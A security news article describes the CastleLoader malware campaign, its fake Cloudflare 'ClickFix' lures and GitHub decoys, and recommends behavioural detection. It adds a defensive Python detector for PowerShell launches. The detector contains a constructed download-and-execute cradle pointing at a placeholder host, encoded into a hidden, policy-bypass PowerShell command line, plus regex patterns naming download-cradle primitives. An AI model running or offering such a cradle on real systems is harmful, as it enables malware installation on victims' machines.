CastleLoader Malware Campaign Exploits Cloudflare-Themed Phishing to Bypass Detection

CastleLoader Malware Campaign Exploits Cloudflare | CyberPro Magazine

Security researchers have uncovered a new malware loader, CastleLoader, which has quickly become a significant player in the cybercriminal ecosystem since early 2025. Delivered through a Cloudflare-themed "ClickFix" lure, the campaign tricks users into running a malicious PowerShell command themselves, under the pretense of fixing site access or completing a security verification.

The malware is typically distributed from convincing fake pages styled as a Cloudflare challenge, which instruct the user to paste a pre-filled command into the Windows Run dialog (Win+R). Once executed, that command starts a silent infection chain that ultimately delivers a range of payloads, from information stealers such as RedLine and StealC to remote access tools such as NetSupport RAT.

A second lure is the use of fake GitHub repositories that impersonate legitimate developer tools. Because github.com is trusted by users and by URL-reputation filters alike, these links raise fewer flags from browser-level or network-based security checks.

A Stealthy and Successful Multi-Stage Attack

Between May and July 2025, researchers recorded 1,634 download attempts and 469 successful infections, a conversion rate of 28.7% from download to infection. CastleLoader's infrastructure was found to use at least seven different C2 servers, some of which specifically targeted enterprise and government environments.

The infection chain begins with JavaScript on the fake Cloudflare page that silently writes a Base64-encoded PowerShell command to the clipboard; the browser Clipboard API permits this in response to a click on the fake "verify" button. The on-screen instructions then tell the user to open the Run dialog and paste, so the user executes the command with their own hands and no browser exploit is needed. The command fetches a ZIP archive containing an AutoIt loader, which resolves the Windows API functions it needs at runtime (dynamic API resolution, which leaves nothing useful in the import table for static scanners) before contacting the C2 servers and downloading additional malware.

Because the traffic is HTTPS and the download links point at github.com, which few organizations block, the campaign blends in with normal developer activity. The loader leaves few artifacts on disk, which makes it hard for signature-based antivirus engines to catch.

Defenders Urged to Shift Toward Behavioral Monitoring

CastleLoader's architecture resembles a malware-as-a-service (MaaS) offering, with a central dashboard that lets operators track infections, swap payloads, and relaunch campaigns in real time. This modularity allows rapid adaptation to new detections and contributes to the loader's longevity.

Experts warn that the campaign exemplifies a dangerous trend: abusing user trust in well-known platforms such as Cloudflare and GitHub while relying on legitimate tooling to do the work. PowerShell is a classic living-off-the-land binary (LOLBin) that ships with Windows; the AutoIt interpreter is not part of Windows, but it is a legitimate, widely used program, so its presence alone rarely triggers an alert. Both make traditional, signature-driven security solutions less effective.

To counter such threats, defenders are advised to focus on behavioral analytics rather than file signatures: PowerShell launched by explorer.exe (the parent of anything started from the Run dialog) with hidden-window, execution-policy-bypass or encoded-command switches; the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what users typed into Run; unexpected AutoIt processes; and unusual outbound connections from those processes. User awareness is equally vital: staff should be taught to verify the source of any "fix-it" prompt and never to paste a copied command into Run or a terminal without understanding it.
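As an added example (not code from the article, the researchers, or the CastleLoader operators), the following Python script ties the infection chain described above to the behavioral checks recommended here. It encodes a constructed ClickFix-style download cradle the way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64), then scans constructed process-creation events for the combination of signals a Run-dialog launch produces: explorer.exe as parent, a hidden window, an execution-policy bypass, an encoded command, and a download cradle in the decoded script. The Sysmon-style field names (ParentImage, Image, CommandLine, ProcessId), the sample events and the download URL are all assumptions of this example.

```python
"""ClickFix / CastleLoader-style PowerShell launch detection over process logs.

Added example. Log events, field names and the download URL are constructed
for illustration; nothing here is taken from CastleLoader samples.
"""
import base64
import json
import re
from typing import Optional

# Constructed stand-in for what a ClickFix page puts on the clipboard:
# fetch an archive, unpack it, run the dropped loader. Placeholder URL.
SAMPLE_SCRIPT = (
    "iwr 'https://example.invalid/verify.zip' -OutFile $env:TEMP\\v.zip; "
    "Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v -Force; "
    "Start-Process $env:TEMP\\v\\verify.exe"
)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Inverse of encode_powershell; None if the blob is not UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# PowerShell accepts abbreviated switches, so match the common short forms too.
ENC_RE = re.compile(r"(?i)\s[-/](?:e|ec|en|enc|encodedcommand)\s+(\S+)")
HIDDEN_RE = re.compile(r"(?i)\s[-/](?:w|win|windowstyle)\s+hidden")
BYPASS_RE = re.compile(
    r"(?i)\s[-/](?:ep|ex|exec|executionpolicy)\s+bypass|\s[-/](?:nop|noprofile)\b"
)
# Download-and-execute primitives commonly seen in one-liner cradles.
CRADLE_RE = re.compile(
    r"(?i)invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b"
)


def analyse_event(event: dict) -> Optional[dict]:
    """Return a finding for a PowerShell launch that shows two or more ClickFix signals."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    reasons = []
    decoded = None
    # Win+R launches are children of explorer.exe; scripts and schedulers are not.
    if parent.endswith("explorer.exe"):
        reasons.append("launched from explorer.exe (Run dialog)")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if BYPASS_RE.search(cmd):
        reasons.append("execution policy bypass / no profile")
    m = ENC_RE.search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(1))
        reasons.append("encoded command" if decoded else "encoded command (undecodable)")
    # Look for the cradle in the decoded script when there is one, else in the raw line.
    if CRADLE_RE.search(decoded or cmd):
        reasons.append("download cradle / remote execution")
    # One weak signal (an admin typing powershell into Run) is not enough to alert.
    if len(reasons) < 2:
        return None
    return {"pid": event.get("ProcessId"), "reasons": reasons, "decoded": decoded}


def scan_log(jsonl: str) -> list:
    """Run analyse_event over JSON-lines process-creation events; return findings."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = analyse_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed events. Only the first should fire: explorer.exe parent, hidden
# window, policy bypass, encoded command, and a cradle in the decoded script.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4812, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc "
                    + encode_powershell(SAMPLE_SCRIPT)},
    {"ProcessId": 2204, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ProcessId": 3360, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoExit -Command Get-Process"},
    {"ProcessId": 1200, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"pid {f['pid']}: {', '.join(f['reasons'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The two-signal threshold is the practical point: an administrator launching PowerShell from Run, or a scheduled task using -EncodedCommand on its own, produces one signal and stays quiet, while the ClickFix launch lights up all five. Feed the script real Sysmon Event ID 1 or EDR process-creation exports in JSON-lines form (mapping the field names if your source uses different ones) and review anything it returns, starting with the decoded command.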

CastleLoader exemplifies the current generation of loaders: stealthy, adaptive, and driven by social engineering rather than software exploits. Its use of fake Cloudflare challenges and GitHub-hosted tools underlines the need for behavior-focused detection and for user education that covers "paste this into Run" prompts specifically.
